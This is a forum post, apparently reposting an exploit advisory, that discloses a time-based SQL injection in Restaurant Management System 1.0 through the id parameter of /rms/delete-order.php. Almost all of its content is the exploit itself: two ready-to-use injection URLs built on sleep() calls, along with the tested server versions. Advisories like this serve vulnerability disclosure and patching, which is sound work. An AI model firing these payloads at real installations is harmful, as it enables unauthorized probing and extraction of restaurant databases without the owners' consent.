跳转到帖子

Restaurant Management System 1.0 - SQL Injection

recommended_posts

发布于
  • Members
# Exploit Title: Restaurant Management System 1.0  - SQL Injection
# Date: 2023-03-20
# Exploit Author: calfcrusher ([email protected])
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link:
https://www.sourcecodester.com/php/11815/restaurant-management-system.html
# Version: 1.0
# Tested on: Apache 2.4.6, PHP 5.4.16

Endpoint: /rms/delete-order.php

Vulnerable parameter: id (GET)

Time Base SQL Injection payloads

http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23
http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)--
            
  • 查看数 704
  • 已创建
  • 最后回复

参与讨论

你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。

游客
回帖…